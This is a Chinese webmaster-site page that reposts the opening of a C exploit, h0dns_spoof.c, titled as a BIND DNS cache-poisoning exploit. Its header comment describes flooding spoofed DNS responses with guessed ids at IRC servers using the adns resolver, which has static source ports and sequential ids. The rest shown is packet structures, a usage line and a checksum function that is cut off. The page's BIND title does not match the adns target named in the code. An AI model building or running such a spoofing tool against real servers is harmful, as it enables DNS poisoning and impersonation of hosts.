站长网_站长创业_站长主页_站长之家_易采站长站

会员投稿 投稿指南 站长资讯通告: TGS CMS 0.3.2r2 Remote Code Execution Exploit
搜索:
您的位置: 主页 > 教程 > 电脑安全 > 黑客漏洞 > » 正文

BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (spoof on i

来源: 易采站长站
/* h0dns_spoof.c - zmda - saik0pod@yahoo.com
* - spoof dns on ircd's using the h0dns code
*
* - spoof dns on anything using the adns (asynchronous dns resolver) code
*
* - The bug:
* - Static source port used by the adns code
* - Sequential DNS ids in request packets
*
* - Initiate sequence to trigger a dns lookup by the adns resolver. Send
* the same range of spoofed DNS ids in a constant flood spoofed as the
* primary DNS server for the host. Even a local DNS request will take
* long enough to allow some amount of the spoofed DNS responses through
* before the primary DNS responds. Since the resolver does not cache
* results, the dns lookups can be triggered until the DNS id is
* incremented within the DNS id range being spoofed.
*
*/ #include <stdio.h>
#include <unistd.h>
#include <stdarg.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <string.h>
#include <errno.h>
#include <time.h> #ifndef u8
#define u8 unsigned char
#endif #ifndef u16
#define u16 unsigned short
#endif #ifndef u32
#define u32 unsigned long
#endif
struct dns_header {
u16 id;
u16 flags;
u16 questions;
u16 answer_rr;
u16 auth_rr;
u16 extra_rr;
} __attribute__((packed)); struct dns_data {
u16 name;
u16 type;
u16 class;
u16 ttlh;
u16 ttl;
u16 data_len; /* data len - sizeof(char *) */
char *data;
/* data */
} __attribute__((packed)); struct dns_packet {
size_t len;
u8 type;
char *data;
/* packet data */
}; struct dns_query {
size_t len;
char *data;
}; struct ip_header {
u8 ihl:4,
version:4;
u8 tos;
u16 tot_len;
u16 id;
u16 frag_off;
u8 ttl;
u8 protocol;
u16 check;
u32 saddr;
u32 daddr;
}; struct udp_header {
u16 source;
u16 dest;
u16 len;
u16 check;
}; #define DNS_A 0x0001
#define DNS_PTR 0x000c struct udp_packet {
struct ip_header iph;
struct udp_header udph;
}; void usage() {
fprintf(stderr, "usage: ./h0dns_spoof <ircd ip> <ircd dns port> <ircd dns ip> "
"<your ip> <spoof host> <dns id>\n");
exit(-1);
} void fatal(char *reason) {
fprintf(stderr, "fatal: %s\n", reason);
exit(-1);
} unsigned short csum(unsigned short *addr, int len) {
register int sum = 0;
Tags:
最新图文资讯
1 2 3 4 5 6
相关文章列表:
易采站长站 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 人才招聘 - 帮助 -